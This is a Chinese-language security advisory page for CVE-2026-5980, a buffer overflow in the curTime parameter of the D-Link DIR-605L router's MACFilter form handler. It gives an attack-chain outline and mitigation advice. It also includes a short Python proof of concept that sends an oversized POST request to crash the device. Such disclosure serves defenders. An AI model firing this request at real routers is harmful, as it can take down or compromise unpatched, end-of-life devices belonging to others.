IPBUF安全漏洞报告
English
CVE-2026-5980 CVSS 8.8 高危

CVE-2026-5980 D-Link DIR-605L 缓冲区溢出漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-5980
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-605L

相关标签

缓冲区溢出D-Link路由器远程代码执行EOL

漏洞概述

D-Link DIR-605L 2.13B01版本中的/goform/formSetMACFilter接口存在缓冲区溢出漏洞。攻击者可通过操纵POST请求中的curTime参数触发该漏洞,导致溢出。由于该产品已停止维护,官方可能不会发布补丁,攻击者可远程发起攻击,获取系统控制权,对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞源于D-Link DIR-605L路由器固件版本2.13B01中处理POST请求的组件存在严重编程错误。具体位于文件`/goform/formSetMACFilter`下的`formSetMACFilter`函数。该函数在处理用户提交的表单数据时,未能对参数`curTime`进行有效的边界检查。攻击者可构造恶意的HTTP POST请求,向`curTime`参数注入超长字符串。当数据拷贝到固定大小的缓冲区时,由于缺乏长度限制,相邻的内存空间将被覆盖。利用CVSS向量中描述的低权限要求,攻击者无需用户交互即可远程触发该溢出,进而可能改变程序执行流程,导致设备崩溃或执行任意恶意代码,完全控制设备。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络或使用Shodan等搜索引擎,寻找暴露在互联网上的D-Link DIR-605L设备,并确认其固件版本为2.13B01。
STEP 2
2. 漏洞利用
攻击者构造特制的HTTP POST请求,目标指向/goform/formSetMACFilter接口,并在curTime参数中填充超长恶意数据。
STEP 3
3. 触发溢出
服务器端接收请求并处理curTime参数时,由于未检查长度,导致缓冲区溢出,覆盖返回地址或关键数据结构。
STEP 4
4. 执行代码
程序流程被劫持,攻击者成功在目标设备上执行任意代码,获取设备控制权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): # Target endpoint url = f"http://{target_ip}/goform/formSetMACFilter" # Malicious payload to trigger buffer overflow # Sending a large string to overflow the buffer payload = "A" * 1000 # Data to be sent in the POST request data = { "curTime": payload } try: print(f"[+] Sending exploit payload to {target_ip}...") response = requests.post(url, data=data, timeout=5) if response.status_code == 200: print("[+] Request sent successfully. Check if the device has crashed.") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "192.168.0.1" # Replace with the actual IP of the router exploit(target)

影响范围

D-Link DIR-605L 2.13B01

防御指南

临时缓解措施
鉴于D-Link DIR-605L已停止官方维护,不存在官方补丁。建议用户尽快更换新型号的网络设备。若需继续临时使用,必须严格限制对路由器Web管理界面的访问,仅允许通过VPN或特定IP进行管理,并关闭远程管理功能(如UPnP、远程Web管理等),以降低被远程攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表